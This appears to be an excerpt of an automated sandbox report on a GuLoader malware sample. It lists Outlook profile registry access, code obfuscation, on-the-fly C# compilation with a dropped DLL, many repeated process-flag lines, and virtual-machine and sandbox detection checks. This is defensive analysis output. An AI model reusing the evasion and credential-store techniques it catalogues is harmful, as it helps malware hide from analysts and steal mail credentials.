Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 0000001A.00000000.1970106356.0000000001350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2220743788.0000000009E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_08508928 push eax; retf 20_2_08508931
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_088C5360 push es; ret 20_2_088C53B6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_08B6C2A1 push eax; mov dword ptr [esp], edx 20_2_08B6C2CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_08B63AF0 push eax; mov dword ptr [esp], edx 20_2_08B63AF4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_08B6CD80 pushad ; retf 20_2_08B6CD81
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_08B640E8 push eax; mov dword ptr [esp], edx 20_2_08B640EC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_08B6E670 push eax; mov dword ptr [esp], ecx 20_2_08B6E684
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_08C6F8A8 push ebp; retf 20_2_08C6F8B6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_08C6F8B8 push esi; retf 20_2_08C6F8F6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_08C68168 push eax; retf 20_2_08C68172
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_08C68297 push esi; retf 20_2_08C682B2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_08C61410 push es; ret 20_2_08C61426
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_08C6EEA0 push ecx; retf 20_2_08C6EF3E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 26_2_20B08612 push 8BFFFFFFh; retf 26_2_20B08618
Compiles C# or VB.Net code
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline Jump to behavior
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.dll Jump to dropped file
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect Any.run
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: powershell.exe, 00000014.00000002.2190887243.0000000008708000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEENT
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1900 Thread sleep time: -16602069666338586s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8544 Thread sleep count: 9229 > 30 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.dll Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8837 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 9229 Jump to behavior
Contains functionality to detect virtual machines (SLDT)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 26_2_1DAD0C40 sldt word ptr [eax] 26_2_1DAD0C40
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
